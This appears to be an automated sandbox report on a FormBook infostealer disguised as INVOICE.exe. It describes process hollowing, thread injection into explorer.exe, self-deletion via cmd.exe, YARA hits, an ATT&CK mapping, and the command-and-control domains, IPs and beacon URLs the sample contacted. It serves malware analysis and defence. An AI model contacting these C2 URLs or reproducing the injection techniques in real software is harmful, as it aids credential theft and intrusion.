          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ACF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ABFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00B78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Code function: 1_2_00ABEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04898CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_048814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04846CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0489740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04846C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0485C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_048905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_047CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04846DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0488FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 104.21.29.70 80
Source: C:\Windows\explorer.exe | Domain query: www.cpf3life.com
Source: C:\Windows\explorer.exe | Domain query: www.phonetomouth.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.dollysusmitha.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\INVOICE.exe | Section loaded: unknown target: C:\Users\user\Desktop\INVOICE.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INVOICE.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INVOICE.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INVOICE.exe | Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INVOICE.exe | Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\INVOICE.exe | Thread register set: target process: 3388
Source: C:\Users\user\Desktop\INVOICE.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\INVOICE.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\INVOICE.exe | Section unmapped: C:\Windows\SysWOW64\systray.exe base address: C50000
Source: C:\Users\user\Desktop\INVOICE.exe | Process created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
Source: C:\Users\user\Desktop\INVOICE.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE.exe'
Source: explorer.exe, 00000003.00000000.205565611.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000000.229535817.0000000001980000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.214706291.0000000006860000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.229535817.0000000001980000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.229535817.0000000001980000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 131 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 3 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features

          Behavior Graph

(Rendered behavior graph not reproduced; node and edge labels recovered from the page.)
Behavior Graph ID: 433143 | Sample: INVOICE.exe | Startdate: 11/06/2021 | Architecture: WINDOWS | Score: 100
• Start node: DNS/IP www.gicc-fx.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 7 other signatures
• INVOICE.exe 20 (started): dropped C:\Users\user\AppData\Local\...\System.dll, PE32; signatures: Detected unpacking (changes PE section rights), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements
• INVOICE.exe (started by INVOICE.exe): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection)
• systray.exe (started by the second INVOICE.exe): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; starts cmd.exe 1, which starts conhost.exe
• explorer.exe (injected by the second INVOICE.exe): DNS/IP www.cpf3life.com 104.21.29.70, 49747, 80 CLOUDFLARENETUS United States; www.phonetomouth.com; 2 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
INVOICE.exe | 66% | ReversingLabs | Win32.Trojan.Emotet
INVOICE.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
0.2.INVOICE.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
0.2.INVOICE.exe.9990000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.INVOICE.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.INVOICE.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.2.systray.exe.4ccf834.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.INVOICE.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
0.0.INVOICE.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
8.2.systray.exe.ac3748.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.cpf3life.com/uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.phonetomouth.com/uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
www.gicc-fx.com/uer0/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.cpf3life.com | 104.21.29.70 | true | true |  | unknown
www.gicc-fx.com | 198.252.100.204 | true | true |  | unknown
phonetomouth.com | 34.102.136.180 | true | false |  | unknown
www.phonetomouth.com | unknown | unknown | true |  | unknown
www.dollysusmitha.com | unknown | unknown | true |  | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.cpf3life.com/uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz | true | Avira URL Cloud: safe | unknown
http://www.phonetomouth.com/uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI | false | Avira URL Cloud: safe | unknown
www.gicc-fx.com/uer0/ | true | Avira URL Cloud: safe | low

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
